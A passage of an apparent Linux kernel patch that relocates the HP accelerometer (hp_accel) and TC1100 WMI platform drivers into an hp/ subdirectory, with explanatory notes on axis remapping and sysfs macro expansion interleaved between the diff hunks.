++ * lis3lv02d_acpi_write - ACPI ALWR method: write to a register
++ * @lis3: pointer to the device struct
++ * @reg:    the register to write to
++ * @val:    the value to write
++ *
++ * Returns 0 on success.
++ */
++static int lis3lv02d_acpi_write(struct lis3lv02d *lis3, int reg, u8 val)
++{
++	struct acpi_device *dev = lis3->bus_priv;
++	unsigned long long ret; /* Not used when writing */
++	union acpi_object in_obj[2];
++	struct acpi_object_list args = { 2, in_obj };
++
++	in_obj[0].type          = ACPI_TYPE_INTEGER;
++	in_obj[0].integer.value = reg;
++	in_obj[1].type          = ACPI_TYPE_INTEGER;
++	in_obj[1].integer.value = val;
++
++	if (acpi_evaluate_integer(dev->handle, "ALWR", &args, &ret) != AE_OK)
++		return -EINVAL;
++
++	return 0;
++}
++
++static int lis3lv02d_dmi_matched(const struct dmi_system_id *dmi)
++{
++	lis3_dev.ac = *((union axis_conversion *)dmi->driver_data);
++	pr_info("hardware type %s found\n", dmi->ident);
++
++	return 1;
++}
++
++/* Represents, for each axis seen by userspace, the corresponding hw axis (+1).
++ * If the value is negative, the opposite of the hw value is used. */
++#define DEFINE_CONV(name, x, y, z)			      \
++	static union axis_conversion lis3lv02d_axis_##name = \
++		{ .as_array = { x, y, z } }
++DEFINE_CONV(normal, 1, 2, 3);
++DEFINE_CONV(y_inverted, 1, -2, 3);
++DEFINE_CONV(x_inverted, -1, 2, 3);
++DEFINE_CONV(x_inverted_usd, -1, 2, -3);
++DEFINE_CONV(z_inverted, 1, 2, -3);
++DEFINE_CONV(xy_swap, 2, 1, 3);
++DEFINE_CONV(xy_rotated_left, -2, 1, 3);
++DEFINE_CONV(xy_rotated_left_usd, -2, 1, -3);
++DEFINE_CONV(xy_swap_inverted, -2, -1, 3);
++DEFINE_CONV(xy_rotated_right, 2, -1, 3);
++DEFINE_CONV(xy_swap_yz_inverted, 2, -1, -3);
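++
++/*
++ * Reading the triplets: xy_rotated_left = { -2, 1, 3 } means userspace
++ * x is the negated hardware y, userspace y is hardware x, and z passes
++ * through unchanged.
++ */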
++
++#define AXIS_DMI_MATCH(_ident, _name, _axis) {		\
++	.ident = _ident,				\
++	.callback = lis3lv02d_dmi_matched,		\
++	.matches = {					\
++		DMI_MATCH(DMI_PRODUCT_NAME, _name)	\
++	},						\
++	.driver_data = &lis3lv02d_axis_##_axis		\
++}
++
++#define AXIS_DMI_MATCH2(_ident, _class1, _name1,	\
++				_class2, _name2,	\
++				_axis) {		\
++	.ident = _ident,				\
++	.callback = lis3lv02d_dmi_matched,		\
++	.matches = {					\
++		DMI_MATCH(DMI_##_class1, _name1),	\
++		DMI_MATCH(DMI_##_class2, _name2),	\
++	},						\
++	.driver_data = &lis3lv02d_axis_##_axis		\
++}
++static const struct dmi_system_id lis3lv02d_dmi_ids[] = {
++	/* product names are truncated to match all variants of the same model */
++	AXIS_DMI_MATCH("NC64x0", "HP Compaq nc64", x_inverted),
++	AXIS_DMI_MATCH("NC84x0", "HP Compaq nc84", z_inverted),
++	AXIS_DMI_MATCH("NX9420", "HP Compaq nx9420", x_inverted),
++	AXIS_DMI_MATCH("NW9440", "HP Compaq nw9440", x_inverted),
++	AXIS_DMI_MATCH("NC2510", "HP Compaq 2510", y_inverted),
++	AXIS_DMI_MATCH("NC2710", "HP Compaq 2710", xy_swap),
++	AXIS_DMI_MATCH("NC8510", "HP Compaq 8510", xy_swap_inverted),
++	AXIS_DMI_MATCH("HP2133", "HP 2133", xy_rotated_left),
++	AXIS_DMI_MATCH("HP2140", "HP 2140", xy_swap_inverted),
++	AXIS_DMI_MATCH("NC653x", "HP Compaq 653", xy_rotated_left_usd),
++	AXIS_DMI_MATCH("NC6730b", "HP Compaq 6730b", xy_rotated_left_usd),
++	AXIS_DMI_MATCH("NC6730s", "HP Compaq 6730s", xy_swap),
++	AXIS_DMI_MATCH("NC651xx", "HP Compaq 651", xy_rotated_right),
++	AXIS_DMI_MATCH("NC6710x", "HP Compaq 6710", xy_swap_yz_inverted),
++	AXIS_DMI_MATCH("NC6715x", "HP Compaq 6715", y_inverted),
++	AXIS_DMI_MATCH("NC693xx", "HP EliteBook 693", xy_rotated_right),
++	AXIS_DMI_MATCH("NC693xx", "HP EliteBook 853", xy_swap),
++	AXIS_DMI_MATCH("NC854xx", "HP EliteBook 854", y_inverted),
++	AXIS_DMI_MATCH("NC273xx", "HP EliteBook 273", y_inverted),
++	/* Intel-based HP Pavilion dv5 */
++	AXIS_DMI_MATCH2("HPDV5_I",
++			PRODUCT_NAME, "HP Pavilion dv5",
++			BOARD_NAME, "3603",
++			x_inverted),
++	/* AMD-based HP Pavilion dv5 */
++	AXIS_DMI_MATCH2("HPDV5_A",
++			PRODUCT_NAME, "HP Pavilion dv5",
++			BOARD_NAME, "3600",
++			y_inverted),
++	AXIS_DMI_MATCH("DV7", "HP Pavilion dv7", x_inverted),
++	AXIS_DMI_MATCH("HP8710", "HP Compaq 8710", y_inverted),
++	AXIS_DMI_MATCH("HDX18", "HP HDX 18", x_inverted),
++	AXIS_DMI_MATCH("HPB432x", "HP ProBook 432", xy_rotated_left),
++	AXIS_DMI_MATCH("HPB440G3", "HP ProBook 440 G3", x_inverted_usd),
++	AXIS_DMI_MATCH("HPB440G4", "HP ProBook 440 G4", x_inverted),
++	AXIS_DMI_MATCH("HPB442x", "HP ProBook 442", xy_rotated_left),
++	AXIS_DMI_MATCH("HPB450G0", "HP ProBook 450 G0", x_inverted),
++	AXIS_DMI_MATCH("HPB452x", "HP ProBook 452", y_inverted),
++	AXIS_DMI_MATCH("HPB522x", "HP ProBook 522", xy_swap),
++	AXIS_DMI_MATCH("HPB532x", "HP ProBook 532", y_inverted),
++	AXIS_DMI_MATCH("HPB655x", "HP ProBook 655", xy_swap_inverted),
++	AXIS_DMI_MATCH("Mini510x", "HP Mini 510", xy_rotated_left_usd),
++	AXIS_DMI_MATCH("HPB63xx", "HP ProBook 63", xy_swap),
++	AXIS_DMI_MATCH("HPB64xx", "HP ProBook 64", xy_swap),
++	AXIS_DMI_MATCH("HPB64xx", "HP EliteBook 84", xy_swap),
++	AXIS_DMI_MATCH("HPB65xx", "HP ProBook 65", x_inverted),
++	AXIS_DMI_MATCH("HPZBook15", "HP ZBook 15", x_inverted),
++	AXIS_DMI_MATCH("HPZBook17G5", "HP ZBook 17 G5", x_inverted),
++	AXIS_DMI_MATCH("HPZBook17", "HP ZBook 17", xy_swap_yz_inverted),
++	{ NULL, }
++/* Laptop models without axis info (yet):
++ * "NC6910" "HP Compaq 6910"
++ * "NC2400" "HP Compaq nc2400"
++ * "NX74x0" "HP Compaq nx74"
++ * "NX6325" "HP Compaq nx6325"
++ * "NC4400" "HP Compaq nc4400"
++ */
++};
++
++static void hpled_set(struct delayed_led_classdev *led_cdev, enum led_brightness value)
++{
++	struct acpi_device *dev = lis3_dev.bus_priv;
++	unsigned long long ret; /* Not used when writing */
++	union acpi_object in_obj[1];
++	struct acpi_object_list args = { 1, in_obj };
++
++	in_obj[0].type          = ACPI_TYPE_INTEGER;
++	in_obj[0].integer.value = !!value;
++
++	acpi_evaluate_integer(dev->handle, "ALED", &args, &ret);
++}
++
++static struct delayed_led_classdev hpled_led = {
++	.led_classdev = {
++		.name			= "hp::hddprotect",
++		.default_trigger	= "none",
++		.brightness_set		= delayed_sysfs_set,
++		.flags                  = LED_CORE_SUSPENDRESUME,
++	},
++	.set_brightness = hpled_set,
++};
++
++static bool hp_accel_i8042_filter(unsigned char data, unsigned char str,
++				  struct serio *port)
++{
++	static bool extended;
++
++	if (str & I8042_STR_AUXDATA)
++		return false;
++
++	if (data == 0xe0) {
++		extended = true;
++		return true;
++	} else if (unlikely(extended)) {
++		extended = false;
++
++		switch (data) {
++		case ACCEL_1:
++		case ACCEL_2:
++		case ACCEL_3:
++		case ACCEL_4:
++			return true;
++		default:
++			serio_interrupt(port, 0xe0, 0);
++			return false;
++		}
++	}
++
++	return false;
++}
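++
++/*
++ * Example: the two-byte sequence e0 25 coming from the accelerometer is
++ * swallowed entirely, while e0 followed by any other byte (say a cursor
++ * key) has the e0 prefix re-injected so the keyboard stream stays intact.
++ */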
++
++static int lis3lv02d_probe(struct platform_device *device)
++{
++	int ret;
++
++	lis3_dev.bus_priv = ACPI_COMPANION(&device->dev);
++	lis3_dev.init = lis3lv02d_acpi_init;
++	lis3_dev.read = lis3lv02d_acpi_read;
++	lis3_dev.write = lis3lv02d_acpi_write;
++
++	/* obtain IRQ number of our device from ACPI */
++	ret = platform_get_irq_optional(device, 0);
++	if (ret > 0)
++		lis3_dev.irq = ret;
++
++	/* If possible use a "standard" axes order */
++	if (lis3_dev.ac.x && lis3_dev.ac.y && lis3_dev.ac.z) {
++		pr_info("Using custom axes %d,%d,%d\n",
++			lis3_dev.ac.x, lis3_dev.ac.y, lis3_dev.ac.z);
++	} else if (dmi_check_system(lis3lv02d_dmi_ids) == 0) {
++		pr_info("laptop model unknown, using default axes configuration\n");
++		lis3_dev.ac = lis3lv02d_axis_normal;
++	}
++
++	/* call the core layer do its init */
++	ret = lis3lv02d_init_device(&lis3_dev);
++	if (ret)
++		return ret;
++
++	/* filter to remove HPQ6000 accelerometer data
++	 * from keyboard bus stream */
++	if (strstr(dev_name(&device->dev), "HPQ6000"))
++		i8042_install_filter(hp_accel_i8042_filter);
++
++	INIT_WORK(&hpled_led.work, delayed_set_status_worker);
++	ret = led_classdev_register(NULL, &hpled_led.led_classdev);
++	if (ret) {
++		i8042_remove_filter(hp_accel_i8042_filter);
++		lis3lv02d_joystick_disable(&lis3_dev);
++		lis3lv02d_poweroff(&lis3_dev);
++		flush_work(&hpled_led.work);
++		lis3lv02d_remove_fs(&lis3_dev);
++		return ret;
++	}
++
++	return ret;
++}
++
++static int lis3lv02d_remove(struct platform_device *device)
++{
++	i8042_remove_filter(hp_accel_i8042_filter);
++	lis3lv02d_joystick_disable(&lis3_dev);
++	lis3lv02d_poweroff(&lis3_dev);
++
++	led_classdev_unregister(&hpled_led.led_classdev);
++	flush_work(&hpled_led.work);
++
++	lis3lv02d_remove_fs(&lis3_dev);
++	return 0;
++}
++
++static int __maybe_unused lis3lv02d_suspend(struct device *dev)
++{
++	/* make sure the device is off when we suspend */
++	lis3lv02d_poweroff(&lis3_dev);
++	return 0;
++}
++
++static int __maybe_unused lis3lv02d_resume(struct device *dev)
++{
++	lis3lv02d_poweron(&lis3_dev);
++	return 0;
++}
++
++static SIMPLE_DEV_PM_OPS(hp_accel_pm, lis3lv02d_suspend, lis3lv02d_resume);
++
++/* For the HP MDPS aka 3D Driveguard */
++static struct platform_driver lis3lv02d_driver = {
++	.probe	= lis3lv02d_probe,
++	.remove	= lis3lv02d_remove,
++	.driver	= {
++		.name	= "hp_accel",
++		.pm	= &hp_accel_pm,
++		.acpi_match_table = lis3lv02d_device_ids,
++	},
++};
++module_platform_driver(lis3lv02d_driver);
++
++MODULE_DESCRIPTION("Glue between LIS3LV02Dx and HP ACPI BIOS and support for disk protection LED.");
++MODULE_AUTHOR("Yan Burman, Eric Piel, Pavel Machek");
++MODULE_LICENSE("GPL");
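
The DMI table above pairs each model with an axis_conversion triple: as the driver's comment explains, each entry gives, for every axis userspace sees, the 1-based hardware axis to read, negated when the sign is negative. A minimal standalone sketch of that remapping (plain C, not driver code; the names are illustrative):

#include <stdlib.h>

/* conv[i] is the 1-based hw axis feeding userspace axis i; a negative
 * value means the hardware reading is inverted. Example: the
 * xy_swap_yz_inverted entry above is { 2, -1, -3 }.
 */
static int remap_axis(int i, const int conv[3], const int raw[3])
{
	int n = conv[i];
	int v = raw[abs(n) - 1];	/* pick the hardware axis */

	return n < 0 ? -v : v;		/* apply the inversion */
}

So with { 2, -1, -3 }, userspace x takes hardware y, userspace y takes hardware x negated, and z is flipped.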
+diff --git a/drivers/platform/x86/hp/tc1100-wmi.c b/drivers/platform/x86/hp/tc1100-wmi.c
+new file mode 100644
+index 0000000000000..ded26213c4202
+--- /dev/null
++++ b/drivers/platform/x86/hp/tc1100-wmi.c
+@@ -0,0 +1,265 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *  HP Compaq TC1100 Tablet WMI Extras Driver
++ *
++ *  Copyright (C) 2007 Carlos Corbacho <carlos@strangeworlds.co.uk>
++ *  Copyright (C) 2004 Jamey Hicks <jamey.hicks@hp.com>
++ *  Copyright (C) 2001, 2002 Andy Grover <andrew.grover@intel.com>
++ *  Copyright (C) 2001, 2002 Paul Diefenbaugh <paul.s.diefenbaugh@intel.com>
++ */
++
++#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
++
++#include <linux/kernel.h>
++#include <linux/module.h>
++#include <linux/slab.h>
++#include <linux/init.h>
++#include <linux/types.h>
++#include <linux/acpi.h>
++#include <linux/platform_device.h>
++
++#define GUID "C364AC71-36DB-495A-8494-B439D472A505"
++
++#define TC1100_INSTANCE_WIRELESS		1
++#define TC1100_INSTANCE_JOGDIAL		2
++
++MODULE_AUTHOR("Jamey Hicks, Carlos Corbacho");
++MODULE_DESCRIPTION("HP Compaq TC1100 Tablet WMI Extras");
++MODULE_LICENSE("GPL");
++MODULE_ALIAS("wmi:C364AC71-36DB-495A-8494-B439D472A505");
++
++static struct platform_device *tc1100_device;
++
++struct tc1100_data {
++	u32 wireless;
++	u32 jogdial;
++};
++
++#ifdef CONFIG_PM
++static struct tc1100_data suspend_data;
++#endif
++
++/* --------------------------------------------------------------------------
++				Device Management
++   -------------------------------------------------------------------------- */
++
++static int get_state(u32 *out, u8 instance)
++{
++	u32 tmp;
++	acpi_status status;
++	struct acpi_buffer result = { ACPI_ALLOCATE_BUFFER, NULL };
++	union acpi_object *obj;
++
++	if (!out)
++		return -EINVAL;
++
++	if (instance > 2)
++		return -ENODEV;
++
++	status = wmi_query_block(GUID, instance, &result);
++	if (ACPI_FAILURE(status))
++		return -ENODEV;
++
++	obj = (union acpi_object *) result.pointer;
++	if (obj && obj->type == ACPI_TYPE_INTEGER) {
++		tmp = obj->integer.value;
++	} else {
++		tmp = 0;
++	}
++
++	if (result.length > 0)
++		kfree(result.pointer);
++
++	switch (instance) {
++	case TC1100_INSTANCE_WIRELESS:
++		*out = (tmp == 3) ? 1 : 0;
++		return 0;
++	case TC1100_INSTANCE_JOGDIAL:
++		*out = (tmp == 1) ? 0 : 1;
++		return 0;
++	default:
++		return -ENODEV;
++	}
++}
++
++static int set_state(u32 *in, u8 instance)
++{
++	u32 value;
++	acpi_status status;
++	struct acpi_buffer input;
++
++	if (!in)
++		return -EINVAL;
++
++	if (instance > 2)
++		return -ENODEV;
++
++	switch (instance) {
++	case TC1100_INSTANCE_WIRELESS:
++		value = (*in) ? 1 : 2;
++		break;
++	case TC1100_INSTANCE_JOGDIAL:
++		value = (*in) ? 0 : 1;
++		break;
++	default:
++		return -ENODEV;
++	}
++
++	input.length = sizeof(u32);
++	input.pointer = &value;
++
++	status = wmi_set_block(GUID, instance, &input);
++	if (ACPI_FAILURE(status))
++		return -ENODEV;
++
++	return 0;
++}
++
++/* --------------------------------------------------------------------------
++				FS Interface (/sys)
++   -------------------------------------------------------------------------- */
++
++/*
++ * Read/write bool sysfs macro
++ */
++#define show_set_bool(value, instance) \
++static ssize_t \
++show_bool_##value(struct device *dev, struct device_attribute *attr, \
++	char *buf) \
++{ \
++	u32 result; \
++	acpi_status status = get_state(&result, instance); \
++	if (ACPI_SUCCESS(status)) \
++		return sprintf(buf, "%d\n", result); \
++	return sprintf(buf, "Read error\n"); \
++} \
++\
++static ssize_t \
++set_bool_##value(struct device *dev, struct device_attribute *attr, \
++	const char *buf, size_t count) \
++{ \
++	u32 tmp = simple_strtoul(buf, NULL, 10); \
++	acpi_status status = set_state(&tmp, instance); \
++		if (ACPI_FAILURE(status)) \
++			return -EINVAL; \
++	return count; \
++} \
++static DEVICE_ATTR(value, S_IRUGO | S_IWUSR, \
++	show_bool_##value, set_bool_##value);
++
++show_set_bool(wireless, TC1100_INSTANCE_WIRELESS);
++show_set_bool(jogdial, TC1100_INSTANCE_JOGDIAL);
++
++static struct attribute *tc1100_attributes[] = {
++	&dev_attr_wireless.attr,
++	&dev_attr_jogdial.attr,
++	NULL
++};
++
++static const struct attribute_group tc1100_attribute_group = {
++	.attrs	= tc1100_attributes,
++};
++
++/* --------------------------------------------------------------------------
++				Driver Model
++   -------------------------------------------------------------------------- */
++
++static int __init tc1100_probe(struct platform_device *device)
++{
++	return sysfs_create_group(&device->dev.kobj, &tc1100_attribute_group);
++}
++
++
++static int tc1100_remove(struct platform_device *device)
++{
++	sysfs_remove_group(&device->dev.kobj, &tc1100_attribute_group);
++
++	return 0;
++}
++
++#ifdef CONFIG_PM
++static int tc1100_suspend(struct device *dev)
++{
++	int ret;
++
++	ret = get_state(&suspend_data.wireless, TC1100_INSTANCE_WIRELESS);
++	if (ret)
++		return ret;
++
++	ret = get_state(&suspend_data.jogdial, TC1100_INSTANCE_JOGDIAL);
++	if (ret)
++		return ret;
++
++	return 0;
++}
++
++static int tc1100_resume(struct device *dev)
++{
++	int ret;
++
++	ret = set_state(&suspend_data.wireless, TC1100_INSTANCE_WIRELESS);
++	if (ret)
++		return ret;
++
++	ret = set_state(&suspend_data.jogdial, TC1100_INSTANCE_JOGDIAL);
++	if (ret)
++		return ret;
++
++	return 0;
++}
++
++static const struct dev_pm_ops tc1100_pm_ops = {
++	.suspend	= tc1100_suspend,
++	.resume		= tc1100_resume,
++	.freeze		= tc1100_suspend,
++	.restore	= tc1100_resume,
++};
++#endif
++
++static struct platform_driver tc1100_driver = {
++	.driver = {
++		.name = "tc1100-wmi",
++#ifdef CONFIG_PM
++		.pm = &tc1100_pm_ops,
++#endif
++	},
++	.remove = tc1100_remove,
++};
++
++static int __init tc1100_init(void)
++{
++	int error;
++
++	if (!wmi_has_guid(GUID))
++		return -ENODEV;
++
++	tc1100_device = platform_device_alloc("tc1100-wmi", PLATFORM_DEVID_NONE);
++	if (!tc1100_device)
++		return -ENOMEM;
++
++	error = platform_device_add(tc1100_device);
++	if (error)
++		goto err_device_put;
++
++	error = platform_driver_probe(&tc1100_driver, tc1100_probe);
++	if (error)
++		goto err_device_del;
++
++	pr_info("HP Compaq TC1100 Tablet WMI Extras loaded\n");
++	return 0;
++
++ err_device_del:
++	platform_device_del(tc1100_device);
++ err_device_put:
++	platform_device_put(tc1100_device);
++	return error;
++}
++
++static void __exit tc1100_exit(void)
++{
++	platform_device_unregister(tc1100_device);
++	platform_driver_unregister(&tc1100_driver);
++}
++
++module_init(tc1100_init);
++module_exit(tc1100_exit);
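
For readers unpicking the show_set_bool() macro above, its wireless instantiation expands to roughly the following pair of handlers plus the attribute definition (reconstructed by hand from the macro, so treat it as illustrative rather than authoritative):

static ssize_t show_bool_wireless(struct device *dev,
				  struct device_attribute *attr, char *buf)
{
	u32 result;
	acpi_status status = get_state(&result, TC1100_INSTANCE_WIRELESS);

	if (ACPI_SUCCESS(status))
		return sprintf(buf, "%d\n", result);
	return sprintf(buf, "Read error\n");
}

static ssize_t set_bool_wireless(struct device *dev,
				 struct device_attribute *attr,
				 const char *buf, size_t count)
{
	u32 tmp = simple_strtoul(buf, NULL, 10);
	acpi_status status = set_state(&tmp, TC1100_INSTANCE_WIRELESS);

	if (ACPI_FAILURE(status))
		return -EINVAL;
	return count;
}

static DEVICE_ATTR(wireless, S_IRUGO | S_IWUSR,
		   show_bool_wireless, set_bool_wireless);

The attribute then surfaces as a "wireless" file under the tc1100-wmi platform device's sysfs directory.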
+diff --git a/drivers/platform/x86/hp_accel.c b/drivers/platform/x86/hp_accel.c
+deleted file mode 100644
+index e9f852f7c27ff..0000000000000
+--- a/drivers/platform/x86/hp_accel.c
++++ /dev/null
+@@ -1,387 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *  hp_accel.c - Interface between LIS3LV02DL driver and HP ACPI BIOS
+- *
+- *  Copyright (C) 2007-2008 Yan Burman
+- *  Copyright (C) 2008 Eric Piel
+- *  Copyright (C) 2008-2009 Pavel Machek
+- */
+-
+-#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
+-
+-#include <linux/kernel.h>
+-#include <linux/init.h>
+-#include <linux/dmi.h>
+-#include <linux/module.h>
+-#include <linux/types.h>
+-#include <linux/platform_device.h>
+-#include <linux/interrupt.h>
+-#include <linux/delay.h>
+-#include <linux/wait.h>
+-#include <linux/poll.h>
+-#include <linux/freezer.h>
+-#include <linux/uaccess.h>
+-#include <linux/leds.h>
+-#include <linux/atomic.h>
+-#include <linux/acpi.h>
+-#include <linux/i8042.h>
+-#include <linux/serio.h>
+-#include "../../misc/lis3lv02d/lis3lv02d.h"
+-
+-/* Delayed LEDs infrastructure ------------------------------------ */
+-
+-/* Special LED class that can defer work */
+-struct delayed_led_classdev {
+-	struct led_classdev led_classdev;
+-	struct work_struct work;
+-	enum led_brightness new_brightness;
+-
+-	unsigned int led;		/* For driver */
+-	void (*set_brightness)(struct delayed_led_classdev *data, enum led_brightness value);
+-};
+-
+-static inline void delayed_set_status_worker(struct work_struct *work)
+-{
+-	struct delayed_led_classdev *data =
+-			container_of(work, struct delayed_led_classdev, work);
+-
+-	data->set_brightness(data, data->new_brightness);
+-}
+-
+-static inline void delayed_sysfs_set(struct led_classdev *led_cdev,
+-			      enum led_brightness brightness)
+-{
+-	struct delayed_led_classdev *data = container_of(led_cdev,
+-			     struct delayed_led_classdev, led_classdev);
+-	data->new_brightness = brightness;
+-	schedule_work(&data->work);
+-}
+-
+-/* HP-specific accelerometer driver ------------------------------------ */
+-
+-/* e0 25, e0 26, e0 27, e0 28 are scan codes that the accelerometer with acpi id
+- * HPQ6000 sends through the keyboard bus */
+-#define ACCEL_1 0x25
+-#define ACCEL_2 0x26
+-#define ACCEL_3 0x27
+-#define ACCEL_4 0x28
+-
+-/* For automatic insertion of the module */
+-static const struct acpi_device_id lis3lv02d_device_ids[] = {
+-	{"HPQ0004", 0}, /* HP Mobile Data Protection System PNP */
+-	{"HPQ6000", 0}, /* HP Mobile Data Protection System PNP */
+-	{"HPQ6007", 0}, /* HP Mobile Data Protection System PNP */
+-	{"", 0},
+-};
+-MODULE_DEVICE_TABLE(acpi, lis3lv02d_device_ids);
+-
+-/**
+- * lis3lv02d_acpi_init - initialize the device for ACPI
+- * @lis3: pointer to the device struct
+- *
+- * Returns 0 on success.
+- */
+-static int lis3lv02d_acpi_init(struct lis3lv02d *lis3)
+-{
+-	return 0;
+-}
+-
+-/**
+- * lis3lv02d_acpi_read - ACPI ALRD method: read a register
+- * @lis3: pointer to the device struct
+- * @reg:    the register to read
+- * @ret:    result of the operation
+- *
+- * Returns 0 on success.
+- */
+-static int lis3lv02d_acpi_read(struct lis3lv02d *lis3, int reg, u8 *ret)
+-{
+-	struct acpi_device *dev = lis3->bus_priv;
+-	union acpi_object arg0 = { ACPI_TYPE_INTEGER };
+-	struct acpi_object_list args = { 1, &arg0 };
+-	unsigned long long lret;
+-	acpi_status status;
+-
+-	arg0.integer.value = reg;
+-
+-	status = acpi_evaluate_integer(dev->handle, "ALRD", &args, &lret);
+-	if (ACPI_FAILURE(status))
+-		return -EINVAL;
+-	*ret = lret;
+-	return 0;
+-}
+-
+-/**
+- * lis3lv02d_acpi_write - ACPI ALWR method: write to a register
+- * @lis3: pointer to the device struct
+- * @reg:    the register to write to
+- * @val:    the value to write
+- *
+- * Returns 0 on success.
+- */
+-static int lis3lv02d_acpi_write(struct lis3lv02d *lis3, int reg, u8 val)
+-{
+-	struct acpi_device *dev = lis3->bus_priv;
+-	unsigned long long ret; /* Not used when writing */
+-	union acpi_object in_obj[2];
+-	struct acpi_object_list args = { 2, in_obj };
+-
+-	in_obj[0].type          = ACPI_TYPE_INTEGER;
+-	in_obj[0].integer.value = reg;
+-	in_obj[1].type          = ACPI_TYPE_INTEGER;
+-	in_obj[1].integer.value = val;
+-
+-	if (acpi_evaluate_integer(dev->handle, "ALWR", &args, &ret) != AE_OK)
+-		return -EINVAL;
+-
+-	return 0;
+-}
+-
+-static int lis3lv02d_dmi_matched(const struct dmi_system_id *dmi)
+-{
+-	lis3_dev.ac = *((union axis_conversion *)dmi->driver_data);
+-	pr_info("hardware type %s found\n", dmi->ident);
+-
+-	return 1;
+-}
+-
+-/* Represents, for each axis seen by userspace, the corresponding hw axis (+1).
+- * If the value is negative, the opposite of the hw value is used. */
+-#define DEFINE_CONV(name, x, y, z)			      \
+-	static union axis_conversion lis3lv02d_axis_##name = \
+-		{ .as_array = { x, y, z } }
+-DEFINE_CONV(normal, 1, 2, 3);
+-DEFINE_CONV(y_inverted, 1, -2, 3);
+-DEFINE_CONV(x_inverted, -1, 2, 3);
+-DEFINE_CONV(x_inverted_usd, -1, 2, -3);
+-DEFINE_CONV(z_inverted, 1, 2, -3);
+-DEFINE_CONV(xy_swap, 2, 1, 3);
+-DEFINE_CONV(xy_rotated_left, -2, 1, 3);
+-DEFINE_CONV(xy_rotated_left_usd, -2, 1, -3);
+-DEFINE_CONV(xy_swap_inverted, -2, -1, 3);
+-DEFINE_CONV(xy_rotated_right, 2, -1, 3);
+-DEFINE_CONV(xy_swap_yz_inverted, 2, -1, -3);
+-
+-#define AXIS_DMI_MATCH(_ident, _name, _axis) {		\
+-	.ident = _ident,				\
+-	.callback = lis3lv02d_dmi_matched,		\
+-	.matches = {					\
+-		DMI_MATCH(DMI_PRODUCT_NAME, _name)	\
+-	},						\
+-	.driver_data = &lis3lv02d_axis_##_axis		\
+-}
+-
+-#define AXIS_DMI_MATCH2(_ident, _class1, _name1,	\
+-				_class2, _name2,	\
+-				_axis) {		\
+-	.ident = _ident,				\
+-	.callback = lis3lv02d_dmi_matched,		\
+-	.matches = {					\
+-		DMI_MATCH(DMI_##_class1, _name1),	\
+-		DMI_MATCH(DMI_##_class2, _name2),	\
+-	},						\
+-	.driver_data = &lis3lv02d_axis_##_axis		\
+-}
+-static const struct dmi_system_id lis3lv02d_dmi_ids[] = {
+-	/* product names are truncated to match all kinds of a same model */
+-	AXIS_DMI_MATCH("NC64x0", "HP Compaq nc64", x_inverted),
+-	AXIS_DMI_MATCH("NC84x0", "HP Compaq nc84", z_inverted),
+-	AXIS_DMI_MATCH("NX9420", "HP Compaq nx9420", x_inverted),
+-	AXIS_DMI_MATCH("NW9440", "HP Compaq nw9440", x_inverted),
+-	AXIS_DMI_MATCH("NC2510", "HP Compaq 2510", y_inverted),
+-	AXIS_DMI_MATCH("NC2710", "HP Compaq 2710", xy_swap),
+-	AXIS_DMI_MATCH("NC8510", "HP Compaq 8510", xy_swap_inverted),
+-	AXIS_DMI_MATCH("HP2133", "HP 2133", xy_rotated_left),
+-	AXIS_DMI_MATCH("HP2140", "HP 2140", xy_swap_inverted),
+-	AXIS_DMI_MATCH("NC653x", "HP Compaq 653", xy_rotated_left_usd),
+-	AXIS_DMI_MATCH("NC6730b", "HP Compaq 6730b", xy_rotated_left_usd),
+-	AXIS_DMI_MATCH("NC6730s", "HP Compaq 6730s", xy_swap),
+-	AXIS_DMI_MATCH("NC651xx", "HP Compaq 651", xy_rotated_right),
+-	AXIS_DMI_MATCH("NC6710x", "HP Compaq 6710", xy_swap_yz_inverted),
+-	AXIS_DMI_MATCH("NC6715x", "HP Compaq 6715", y_inverted),
+-	AXIS_DMI_MATCH("NC693xx", "HP EliteBook 693", xy_rotated_right),
+-	AXIS_DMI_MATCH("NC693xx", "HP EliteBook 853", xy_swap),
+-	AXIS_DMI_MATCH("NC854xx", "HP EliteBook 854", y_inverted),
+-	AXIS_DMI_MATCH("NC273xx", "HP EliteBook 273", y_inverted),
+-	/* Intel-based HP Pavilion dv5 */
+-	AXIS_DMI_MATCH2("HPDV5_I",
+-			PRODUCT_NAME, "HP Pavilion dv5",
+-			BOARD_NAME, "3603",
+-			x_inverted),
+-	/* AMD-based HP Pavilion dv5 */
+-	AXIS_DMI_MATCH2("HPDV5_A",
+-			PRODUCT_NAME, "HP Pavilion dv5",
+-			BOARD_NAME, "3600",
+-			y_inverted),
+-	AXIS_DMI_MATCH("DV7", "HP Pavilion dv7", x_inverted),
+-	AXIS_DMI_MATCH("HP8710", "HP Compaq 8710", y_inverted),
+-	AXIS_DMI_MATCH("HDX18", "HP HDX 18", x_inverted),
+-	AXIS_DMI_MATCH("HPB432x", "HP ProBook 432", xy_rotated_left),
+-	AXIS_DMI_MATCH("HPB440G3", "HP ProBook 440 G3", x_inverted_usd),
+-	AXIS_DMI_MATCH("HPB440G4", "HP ProBook 440 G4", x_inverted),
+-	AXIS_DMI_MATCH("HPB442x", "HP ProBook 442", xy_rotated_left),
+-	AXIS_DMI_MATCH("HPB450G0", "HP ProBook 450 G0", x_inverted),
+-	AXIS_DMI_MATCH("HPB452x", "HP ProBook 452", y_inverted),
+-	AXIS_DMI_MATCH("HPB522x", "HP ProBook 522", xy_swap),
+-	AXIS_DMI_MATCH("HPB532x", "HP ProBook 532", y_inverted),
+-	AXIS_DMI_MATCH("HPB655x", "HP ProBook 655", xy_swap_inverted),
+-	AXIS_DMI_MATCH("Mini510x", "HP Mini 510", xy_rotated_left_usd),
+-	AXIS_DMI_MATCH("HPB63xx", "HP ProBook 63", xy_swap),
+-	AXIS_DMI_MATCH("HPB64xx", "HP ProBook 64", xy_swap),
+-	AXIS_DMI_MATCH("HPB64xx", "HP EliteBook 84", xy_swap),
+-	AXIS_DMI_MATCH("HPB65xx", "HP ProBook 65", x_inverted),
+-	AXIS_DMI_MATCH("HPZBook15", "HP ZBook 15", x_inverted),
+-	AXIS_DMI_MATCH("HPZBook17G5", "HP ZBook 17 G5", x_inverted),
+-	AXIS_DMI_MATCH("HPZBook17", "HP ZBook 17", xy_swap_yz_inverted),
+-	{ NULL, }
+-/* Laptop models without axis info (yet):
+- * "NC6910" "HP Compaq 6910"
+- * "NC2400" "HP Compaq nc2400"
